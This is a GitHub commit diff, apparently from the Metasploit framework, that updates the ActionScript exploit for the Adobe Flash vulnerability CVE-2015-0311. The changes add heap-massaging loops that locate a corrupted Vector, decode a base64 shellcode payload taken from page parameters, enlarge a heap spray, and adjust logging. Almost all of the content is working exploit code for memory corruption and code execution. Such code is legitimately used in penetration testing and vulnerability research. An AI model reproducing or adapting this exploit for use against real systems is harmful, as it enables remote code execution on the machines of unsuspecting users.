Skip to content

Commit a1538fc

Browse files
jvazquez-r7jvazquez-r7
committed
Update AS code
1 parent 3e122fe commit a1538fc

File tree

3 files changed

+34
-19
lines changed

3 files changed

+34
-19
lines changed

external/source/exploits/CVE-2015-0311/Exploit.as

Lines changed: 27 additions & 6 deletions
Original file line numberDiff line numberDiff line change
@@ -26,15 +26,20 @@ package
2626
private var b64:Base64Decoder = new Base64Decoder()
2727
private var payload:String
2828
private var platform:String
29+
private var massage:Vector.<Object> = new Vector.<Object>(10000)
2930

3031
public function Exploit()
3132
{
3233
platform = LoaderInfo(this.root.loaderInfo).parameters.pl
33-
b64.decode(LoaderInfo(this.root.loaderInfo).parameters.sh)
34-
payload = b64.toByteArray().toString();
34+
var b64_payload:String = LoaderInfo(this.root.loaderInfo).parameters.sh
35+
var pattern:RegExp = / /g;
36+
b64_payload = b64_payload.replace(pattern, "+")
37+
b64.decode(b64_payload)
38+
payload = b64.toByteArray().toString()
3539

36-
// defrag
37-
for (var i:uint = 0; i < 10000; i++) new Vector.<uint>(0x3e0)
40+
for (var i:uint = 0; i < massage.length / 2; i++) {
41+
massage[i] = new Vector.<uint>(0x3e0)
42+
}
3843

3944
for (i = 0; i < 1000; i++) ba.writeUnsignedInt(data++)
4045
ba.compress()
@@ -44,8 +49,10 @@ package
4449
try {
4550
ba.uncompress()
4651
} catch (e:Error) { }
47-
uv = new Vector.<uint>(0x3e0)
48-
uv[0] = 0
52+
53+
for (i = massage.length / 2; i < massage.length; i++) {
54+
massage[i] = new Vector.<uint>(0x3e0)
55+
}
4956

5057
var test:uint = li32(0)
5158
if (test == 0x3e0) {
@@ -54,6 +61,20 @@ package
5461
Logger.log('[*] Exploit - corruption fail: ' + test.toString(16))
5562
return // something failed
5663
}
64+
65+
66+
for (i = 0; i < massage.length; i++) {
67+
if (massage[i].length == 0x3e0) {
68+
massage[i] = null
69+
} else {
70+
Logger.log('[*] Exploit - corrupted vector found at ' + i)
71+
uv = massage[i]
72+
uv[0] = 0
73+
}
74+
}
75+
76+
if (uv.length != 0xffffffff)
77+
return
5778

5879
exploiter = new Exploiter(this, platform, payload, uv)
5980
}

external/source/exploits/CVE-2015-0311/Exploiter.as

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -23,7 +23,7 @@ package
2323
private var payload_address:uint
2424
private var stack:Vector.<uint> = new Vector.<uint>(0x6400)
2525
private var payload_space:Vector.<uint> = new Vector.<uint>(0x6400)
26-
private var spray:Vector.<Object> = new Vector.<Object>(51200)
26+
private var spray:Vector.<Object> = new Vector.<Object>(80000)
2727

2828
public function Exploiter(exp:Exploit, pl:String, p: String, uv:Vector.<uint>):void
2929
{

external/source/exploits/CVE-2015-0311/Logger.as

Lines changed: 6 additions & 12 deletions
Original file line numberDiff line numberDiff line change
@@ -7,13 +7,10 @@ package
77

88
public static function alert(msg:String):void
99
{
10-
if (DEBUG == 0)
11-
return
12-
1310
var str:String = "";
14-
str += msg;
15-
16-
trace(str);
11+
12+
if (DEBUG == 1)
13+
str += msg;
1714

1815
if(ExternalInterface.available){
1916
ExternalInterface.call("alert", str);
@@ -22,13 +19,10 @@ package
2219

2320
public static function log(msg:String):void
2421
{
25-
if (DEBUG == 0)
26-
return
27-
2822
var str:String = "";
29-
str += msg;
30-
31-
trace(str);
23+
24+
if (DEBUG == 1)
25+
str += msg;
3226

3327
if(ExternalInterface.available){
3428
ExternalInterface.call("console.log", str);

0 commit comments

Comments
 (0)